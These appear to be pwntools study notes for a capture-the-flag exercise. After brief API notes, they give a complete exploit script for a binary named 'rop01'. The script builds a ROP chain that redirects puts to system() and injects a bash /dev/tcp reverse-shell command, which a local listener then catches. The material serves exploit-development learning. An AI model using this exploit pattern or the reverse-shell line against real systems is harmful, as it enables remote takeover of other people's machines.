pwntools
what?
CTF framework and exploit development library.
Written in Python.
pwn : toolbox optimized for CTFs
pwnlib : the general-purpose Python library behind it
Getting Started
1. Making connections
(1)remote
Creates a TCP or UDP connection to a remote host (supports both IPv4 and IPv6).
class : remote(host, port, fam='any', typ='tcp', ssl=False [bool], sock=None, *args, **kwargs)
>>> r = remote('google.com', 443, ssl=True)
>>> r.send('GET /\r\n\r\n')
>>> r.recvn(4)
'HTTP'
(2)listen
Creates a TCP or UDP socket that listens for an incoming connection and can then receive data (used below to catch the reverse shell).
-------------------------------------------------------python code---------------------------------------------------------
#!/usr/bin/env python
# encoding: utf-8
import sys
import time
from pwn import *

# getting started --------------- local or remote or ssh / ELF info --------------------
LOCAL = "remote" not in sys.argv    # LOCAL is True when "remote" is not given on the command line
elf = ELF("./rop01")                # target program ELF
context.update(binary=elf)          # take arch / OS / endianness from the target binary
if LOCAL:
    libc = elf.libc                 # libc the local process will load
    r = process(elf.path)
else:
    libc = ELF("libc.so")           # libc of the remote target (remote / ssh setting)
    r = remote("localhost", 1337)   # target service; replace host/port with the real target
l = listen(1337)                    # catches the reverse shell the payload spawns (127.0.0.1:1337)

# debugging -----------------------------------------------------------------------------
def debug(cmd=''):
    if "gdb" in sys.argv:           # attach gdb, run cmd (e.g. breakpoints), then continue
        pie_base, glibc_base = r.libs()[elf.path], r.libs()[libc.path]
        gdb.attach(r.proc.pid, cmd + "\nc")
    elif "strace" in sys.argv:      # alternatively trace syscalls in a new terminal
        run_in_new_terminal("strace -ff -p %d" % r.proc.pid)
        time.sleep(0.5)
# ---------------------------------------------------------------------------------------
debug('b *0x8048701')

r.sendlineafter(b"What is your name?\n> ", b"bash -c 'bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'\x00")
r.sendlineafter(b"What is your quest?\n> ", b"B" * 100)
payload = flat(
    b"C" * 112,
    # NEED CONTROL OF EBP
    0x0804871a,                                        # popad ; cld ; ret
    0,                                                 # EDI
    0,                                                 # ESI
    elf.got['puts'] - 0xc,                             # EBP
    b"TEST",
    0,                                                 # EBX
    libc.symbols['system'] - libc.symbols['puts'],     # EDX
    0,                                                 # ECX
    0,                                                 # EAX
    0x0804858c,                                        # mov eax, dword [ebp+0x0C] ; add eax, edx ; pop ebp ; ret ; (1 found)
    b"JUNK",                                           # pop ebp
    0x080484f1,                                        # call eax
    elf.symbols['answer1']
)
r.sendlineafter(b"What is the air-speed velocity of an unladen swallow?\n> ", payload)
log.info('Waiting for a shell...')
l.wait_for_connection()
l.interactive()
r.close()